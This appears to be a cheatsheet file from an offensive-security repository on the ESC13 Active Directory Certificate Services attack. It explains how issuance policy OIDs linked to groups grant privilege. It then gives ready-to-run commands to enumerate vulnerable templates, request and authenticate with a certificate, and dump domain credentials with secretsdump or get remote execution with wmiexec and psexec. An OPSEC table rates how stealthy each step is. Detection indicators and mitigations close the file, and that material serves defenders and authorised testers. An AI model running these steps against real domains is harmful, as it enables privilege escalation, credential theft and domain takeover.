daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

esc13-issuance-policy-oid-group-link.md (9479B)


      1 ---
      2 title: "ESC13 — Issuance Policy OID Group Link"
      3 description: "ESC13 is fundamentally different from every other ESC attack. Where ESC1–ESC12 focus on impersonating a specific user, ESC13 achieves privilege escalation…"
      4 category: active-directory
      5 subcategory: "ADCS & Certificates"
      6 tags: ["active-directory", "adcs", "privilege-escalation"]
      7 tools: ["Impacket", "Certipy", "BloodHound", "ldapsearch", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/ACL-ESC-Techniques/ESC13 — Issuance Policy OID Group Link.md"
     11 ---
     12 # ESC13 — Issuance Policy OID Group Link
     13 
     14 ## Quick Reference
     15 
     16 | Field | Value |
     17 |-------|-------|
     18 | **Category** | Issuance Policy / Group Membership Escalation |
     19 | **Difficulty** | Medium |
     20 | **Pre-requisites** | Enrollment rights on a template with linked issuance policy OID |
     21 | **Tools** | Certipy, BloodHound, PowerView |
     22 | **OPSEC Noise** | Low — uses legitimate enrollment, no attribute manipulation |
     23 | **One-liner** | Enroll in a template whose issuance policy OID is linked to a privileged AD group via `ms-DS-OIDToGroup-Link`, granting effective group membership upon certificate authentication. |
     24 
     25 ***
     26 
     27 ## What Is ESC13?
     28 
     29 ESC13 is fundamentally different from every other ESC attack. Where ESC1–ESC12 focus on **impersonating a specific user**, ESC13 achieves privilege escalation by **gaining effective membership in a privileged group** — without any AD account attribute modification, without UPN swapping, and without SAN injection.
     30 
     31 The mechanism exploits Microsoft's **Authentication Mechanism Assurance (AMA)** feature. AMA allows organisations to map an Issuance Policy OID in a certificate to an AD security group via the `ms-DS-OIDToGroup-Link` attribute. When a user authenticates with a certificate that has this policy, the KDC adds the linked group's SID to the user's Privilege Attribute Certificate (PAC) — effectively granting them membership in that group for the duration of the session.
     32 
     33 The abuse: if a low-privileged user can **enroll** in a template that includes an issuance policy linked to a privileged group (like Domain Admins or a custom admin group), they receive that group's privileges upon certificate-based authentication.
     34 
     35 ***
     36 
     37 ## The Mechanism
     38 
     39 ```
     40 Normal AMA flow (intended):
     41   Template has Issuance Policy → OID "1.2.3.4.5.6"
     42   OID "1.2.3.4.5.6" linked via ms-DS-OIDToGroup-Link → "PKI-Admins" group
     43   User enrolls → Cert has Issuance Policy "1.2.3.4.5.6"
     44   User authenticates → KDC adds "PKI-Admins" SID to PAC
     45   Result: User has PKI-Admins privileges for this session
     46 
     47 ESC13 abuse:
     48   Same flow — but enrollment rights are overly permissive
     49   Low-priv user enrolls in the template
     50   Gets effective group membership in a privileged group
     51   = Privilege escalation without modifying any AD object
     52 ```
     53 
     54 ***
     55 
     56 ## Required Conditions
     57 
     58 | Condition | Notes |
     59 |-----------|-------|
     60 | Template has an **Issuance Policy** configured | Check template's `msPKI-Certificate-Policy` attribute |
     61 | The Issuance Policy OID has **`ms-DS-OIDToGroup-Link`** set | Links to a security group |
     62 | The linked group is **privileged** | Domain Admins, custom admin groups, etc. |
     63 | Low-priv users can **enroll** | `Enrollment Rights: Domain Users` |
     64 | Manager Approval is off | `Requires Manager Approval: False` |
     65 | No authorized signatures required | `Authorized Signatures Required: 0` |
     66 | Template has **Client Authentication EKU** | For domain authentication |
     67 
     68 ***
     69 
     70 ## Step 0 — Enumeration
     71 
     72 ```bash
     73 # Standard certipy scan
     74 certipy-ad find -u 'lowpriv@domain.htb' -p 'Password123!' \
     75   -dc-ip $TARGET -vulnerable -stdout
     76 
     77 # Look for ESC13 in output — certipy flags it when it detects OID group links
     78 ```
     79 
     80 ### What Vulnerable ESC13 Output Looks Like
     81 
     82 ```
     83 Certificate Templates
     84   Template Name                       : LinkedPolicyTemplate
     85   Enabled                             : True
     86   Client Authentication               : True
     87   Enrollee Supplies Subject           : False
     88   Requires Manager Approval           : False
     89   Authorized Signatures Required      : 0
     90   Certificate Policies                : 1.2.3.4.5.6.7.8   ← Issuance Policy OID
     91   Permissions
     92     Enrollment Rights : DOMAIN\Domain Users
     93 
     94   [!] Vulnerabilities
     95     ESC13 : Certificate template has an issuance policy OID linked
     96             to a group via ms-DS-OIDToGroup-Link
     97     OID Group Link : DOMAIN\PrivilegedGroup
     98 ```
     99 
    100 ### Manual Enumeration of OID Group Links
    101 
    102 ```powershell
    103 # PowerShell — find all OID objects with group links
    104 Get-ADObject -SearchBase "CN=OID,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=htb" \
    105   -Filter {msPKI-Cert-Template-OID -like '*'} \
    106   -Properties 'ms-DS-OIDToGroup-Link','msPKI-Cert-Template-OID','DisplayName' |
    107   Where-Object { $_.'ms-DS-OIDToGroup-Link' -ne $null } |
    108   Select-Object DisplayName, 'msPKI-Cert-Template-OID', 'ms-DS-OIDToGroup-Link'
    109 
    110 # Output shows which OIDs are linked to which groups
    111 ```
    112 
    113 ```bash
    114 # From Linux via LDAP
    115 ldapsearch -x -H ldap://$TARGET -D 'lowpriv@domain.htb' -w 'Password123!' \
    116   -b "CN=OID,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=htb" \
    117   '(msDS-OIDToGroupLink=*)' dn msDS-OIDToGroupLink msPKI-Cert-Template-OID
    118 ```
    119 
    120 ***
    121 
    122 ## Full Attack Chain — Linux (Certipy)
    123 
    124 ### Step 1 — Request Certificate from the Linked Template
    125 
    126 ```bash
    127 certipy-ad req \
    128   -u 'lowpriv@domain.htb' \
    129   -p 'Password123!' \
    130   -dc-ip $TARGET \
    131   -ca 'DOMAIN-CA-NAME' \
    132   -template 'LinkedPolicyTemplate'
    133 
    134 # Output: lowpriv.pfx
    135 # This cert contains the Issuance Policy OID that is linked to the privileged group
    136 ```
    137 
    138 ### Step 2 — Authenticate with the Certificate
    139 
    140 ```bash
    141 certipy-ad auth \
    142   -pfx lowpriv.pfx \
    143   -username lowpriv \
    144   -domain domain.htb \
    145   -dc-ip $TARGET
    146 
    147 # The KDC adds the linked group's SID to your PAC
    148 # You now effectively have that group's privileges
    149 ```
    150 
    151 ### Step 3 — Use Elevated Privileges
    152 
    153 ```bash
    154 export KRB5CCNAME=lowpriv.ccache
    155 
    156 # If the linked group has DCSync rights:
    157 secretsdump.py -k -no-pass DC01.domain.htb
    158 
    159 # If the linked group has admin access:
    160 wmiexec.py -k -no-pass DC01.domain.htb
    161 psexec.py -k -no-pass DC01.domain.htb
    162 ```
    163 
    164 > 💡 Your TGT has the privileged group's SID in the PAC. Any service that checks group membership via the PAC will grant you access. You don't need to pass-the-hash or impersonate another user — **you ARE still lowpriv, but with extra group memberships**.
    165 
    166 ***
    167 
    168 ## ESC13 Visual Attack Flow
    169 
    170 ```
    171 [lowpriv@domain.htb]
    172         │
    173         │  certipy req -template LinkedPolicyTemplate
    174         ▼
    175 [lowpriv.pfx] ← Contains Issuance Policy OID 1.2.3.4.5.6
    176         │
    177         │  certipy auth -pfx lowpriv.pfx
    178         ▼
    179 [KDC processes cert → sees OID → looks up ms-DS-OIDToGroup-Link]
    180         │
    181         │  KDC adds PrivilegedGroup SID to PAC
    182         ▼
    183 [TGT for lowpriv WITH PrivilegedGroup membership]
    184         │
    185         ▼
    186 [PRIVILEGE ESCALATION — access controlled by group membership]
    187 ```
    188 
    189 ***
    190 
    191 ## ESC13 vs All Other ESCs
    192 
    193 | | ESC1–12 / ESC15–17 | **ESC13** |
    194 |---|---|---|
    195 | **What you get** | Identity of another user | **Group membership for yourself** |
    196 | **UPN change required** | Usually yes | ❌ No |
    197 | **SAN injection required** | Often yes | ❌ No |
    198 | **Account manipulation** | Often yes | ❌ No |
    199 | **Your identity changes** | ✅ You become someone else | ❌ **You stay YOU — just with extra groups** |
    200 | **Mechanism** | Certificate identity spoofing | **PAC group SID injection via AMA** |
    201 | **Stealth** | Varies | 🟢 **Very stealthy — legitimate enrollment** |
    202 
    203 ***
    204 
    205 ## OPSEC Considerations
    206 
    207 | Action | Log Generated | Noise Level |
    208 |--------|--------------|-------------|
    209 | Certificate request | Event ID 4886/4887 | 🟢 Low (looks like normal enrollment) |
    210 | Certificate auth | Event ID 4768 (TGT request) | 🟢 Low (normal PKINIT) |
    211 | Privileged action with TGT | Depends on what you do | 🟡 Medium |
    212 
    213 > 💡 ESC13 is one of the **stealthiest** ESC attacks because it uses completely legitimate enrollment functionality. No AD attributes are modified, no accounts are impersonated — you simply enroll in a template you're allowed to use. The only anomaly is a low-priv user suddenly having privileged access.
    214 
    215 ***
    216 
    217 ## Detection Indicators
    218 
    219 - **Event ID 4887** — Certificate issued from a template that has an issuance policy linked to a privileged group — cross-reference requester's actual group memberships
    220 - **PAC analysis** — TGTs containing group SIDs that don't match the user's actual AD group memberships
    221 - **BloodHound** — Edges from low-priv principals to templates with linked OID groups
    222 - **Audit `ms-DS-OIDToGroup-Link`** — Any OID object with this attribute pointing to a privileged group should be treated as a Tier 0 configuration
    223 
    224 ***
    225 
    226 ## Mitigation
    227 
    228 - **Restrict enrollment rights** on templates with linked issuance policies — these should only be enrollable by the intended audience (e.g., Tier 0 admins)
    229 - **Audit all `ms-DS-OIDToGroup-Link` attributes** — verify that every linked group is intentionally exposed to certificate-based membership
    230 - **Avoid linking OIDs to highly privileged groups** — Domain Admins, Enterprise Admins, Schema Admins should never be linked to issuance policies
    231 - **Monitor certificate enrollment** for templates with issuance policies — alert on enrollment by users not in the intended group
    232 - **Remove unused issuance policies** — if the AMA feature isn't actively used, remove all OID group links